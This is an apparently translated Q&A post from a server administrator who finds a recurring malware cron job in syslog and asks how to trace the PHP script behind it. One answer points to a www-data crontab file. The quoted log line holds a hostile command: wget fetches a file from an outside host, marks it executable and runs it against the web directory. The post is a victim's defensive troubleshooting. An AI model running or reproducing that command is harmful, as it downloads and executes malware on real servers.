在系统日志中发现 php 恶意软件

在系统日志中发现 php 恶意软件

我有一个每分钟运行的恶意软件,我可以从 /var/log/syslog 看到它

Feb  1 18:30:01 MENCH CRON[1768]: (www-data) CMD (wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /var/www/website.com 24 && rm -f xxxd)

我怎样才能知道哪个php脚本正在执行?

在服务器上我只有 nginx、php fpm 以及 4 个小网站和 mysql。而已

更新 通过停止 nginx,该调用继续每分钟执行一次

答案1

/var/spool/cron/crontabs 中有一个由一些 php 脚本创建的 www-data 文件。解决了

相关内容